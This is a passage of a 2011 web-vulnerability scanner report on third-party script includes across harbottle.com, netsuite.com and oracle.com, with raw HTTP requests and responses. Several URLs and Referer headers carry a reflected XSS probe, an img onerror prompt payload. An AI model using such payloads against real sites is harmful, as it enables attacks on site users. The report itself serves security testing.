Path:	/hnl/pages/article_view_hnl/1689.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

20.120. http://www.harbottle.com/hnl/pages/articles/direct_beauty_products_trimsole.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/articles/direct_beauty_products_trimsole.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

20.121. http://www.harbottle.com/hnl/pages/hnl.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

20.122. http://www.harbottle.com/hnl/pages/hnl_search2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl_search2.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 11173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.123. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

20.124. http://www.harbottle.com/hnl/pages/hnl_search2.php/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl_search2.php/a

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pages/hnl_search2.php/a HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:14 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5108
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.125. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:14 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5134
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.126. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pages/hnl_search2.php/pix/L500%20Logo.gif HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:14 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5120
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.127. http://www.harbottle.com/hnl/pages/pubs/479 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/pubs/479

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pages/pubs/479 HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:45 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 15831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.128. http://www.harbottle.com/hnl/pix/newsletters/50th_logo.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pix/newsletters/50th_logo.jpg

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pix/newsletters/50th_logo.jpg HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:44:42 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 7431
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.129. http://www.harbottle.com/hnl/pix/newsletters/ESportsMasthead.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pix/newsletters/ESportsMasthead.jpg

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pix/newsletters/ESportsMasthead.jpg HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

20.130. http://www.harbottle.com/hnl/pix/newsletters/gronholm_NSLTR.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pix/newsletters/gronholm_NSLTR.jpg

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pix/newsletters/gronholm_NSLTR.jpg HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:44:43 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 7431
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.131. http://www.harbottle.com/hnl/pix/newsletters/rugby3.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pix/newsletters/rugby3.jpg

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pix/newsletters/rugby3.jpg HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

20.132. http://www.harbottle.com/hnl/pix/newsletters/sjones.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pix/newsletters/sjones.jpg

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pix/newsletters/sjones.jpg HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

20.133. http://www.harbottle.com/hnl/pix/square.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pix/square.gif

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pix/square.gif HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

20.134. http://www.harbottle.com/hnl/pix/square_FF9933.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pix/square_FF9933.gif

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /hnl/pix/square_FF9933.gif HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

20.135. http://www.netsuite.com/portal/home.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netsuite.com
Path:	/portal/home.shtml

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /portal/home.shtml HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0; mbox=session#1315341135013-154927#1315343323|PC#1315341135013-154927.19#1316551063|check#true#1315341523

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 76984
Content-Disposition: inline;filename="home.shtml"
NS_RTIMER_COMPOSITE: -2028607536:73686F702D6A6176613030322E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=F
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:37:46 GMT
Connection: close
Vary: Accept-Encoding

<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.136. http://www.netsuite.com/portal/products/netsuite/financials/main.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netsuite.com
Path:	/portal/products/netsuite/financials/main.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google-analytics.com/urchin.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /portal/products/netsuite/financials/main.shtml HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/home.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0; mbox=session#1315341135013-154927#1315343327|PC#1315341135013-154927.19#1316551067|check#true#1315341527; bn_u=6923713758307492964; __utma=1.2120471585.1315341469.1315341469.1315341469.1; __utmb=1.2.9.1315341851977; __utmc=1; __utmz=1.1315341469.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315341851979%2C%22u%22%3A%226923713758307492964%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Ffinancials%2Fmain.shtml%22%2C%22l%22%3A%22financials%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20is%20the%20leading%20integrated%20web-based%20business%20software%20suite%2C%20including%20business%20accounting%20software%2C%20ERP%20software%2C%20CRM%20software%20and%20ecommerce%20software.%20Effectively%20and%20efficiently%20manage%20all%20of%20your%20key%20business%20operations%20with%20one%20seamless%20business%20software%20solution!%22%2C%22ti%22%3A%22Cloud%20ERP%2C%20Business%20Accounting%20Software%2C%20CRM%2C%20Ecommerce%20%E2%80%94%20NetSuite%22%2C%22nw%22%3A475%2C%22nl%22%3A226%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 46194
Content-Disposition: inline;filename="main.shtml"
NS_RTIMER_COMPOSITE: -804654991:73686F702D6A6176613030342E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=F
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:44:12 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">

</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.137. http://www.netsuite.com/portal/products/netsuite/revenue/main.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netsuite.com
Path:	/portal/products/netsuite/revenue/main.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google-analytics.com/urchin.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /portal/products/netsuite/revenue/main.shtml HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/netsuite/financials/main.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0; bn_u=6923713758307492964; mbox=session#1315341135013-154927#1315343714|PC#1315341135013-154927.19#1316551454|check#true#1315341914; __utma=1.2120471585.1315341469.1315341469.1315341469.1; __utmb=1.3.9.1315341851977; __utmc=1; __utmz=1.1315341469.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_u=6923713758307492964; __utma=19239463.762044252.1315341857.1315341857.1315341857.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1315341857.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Ffinancials%2Fmain.shtml%22%2C%22r%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml%22%2C%22t%22%3A1315341860009%2C%22u%22%3A%226923713758307492964%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Frevenue%2Fmain.shtml%22%2C%22l%22%3A%22Recurring%20Revenue%20Management%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20is%20the%20%231%20integrated%2C%20SaaS%20ERP%20(Enterprise%20Resource%20Planning)%20software%20for%20growing%20businesses.%20Run%20your%20entire%20business%20in%20real-time%20from%20front%20to%20back%20office%20with%20one%20seamlessly%20integrated%20system%20that%20includes%20accounting%20%2F%20ERP%2C%20CRM%2C%20and%20Ecommerce.%22%2C%22ti%22%3A%22NetSuite%20Financials%22%2C%22nw%22%3A877%2C%22nl%22%3A229%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 39464
Content-Disposition: inline;filename="main.shtml"
NS_RTIMER_COMPOSITE: -2027146723:73686F702D6A6176613030312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=F
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:44:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">

</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.138. http://www.oracle.com/ao/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/ao/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /ao/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=41185998748378867,0:1)
Date: Tue, 06 Sep 2011 16:16:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.139. http://www.oracle.com/as/corporate/contact/bangladesh-316183-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/bangladesh-316183-en-as.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /as/corporate/contact/bangladesh-316183-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.140. http://www.oracle.com/as/corporate/contact/bhutan-316187-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/bhutan-316187-en-as.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /as/corporate/contact/bhutan-316187-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.141. http://www.oracle.com/as/corporate/contact/brunei-316198-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/brunei-316198-en-as.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /as/corporate/contact/brunei-316198-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=36013329115639045,0:1)
Date: Tue, 06 Sep 2011 16:16:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
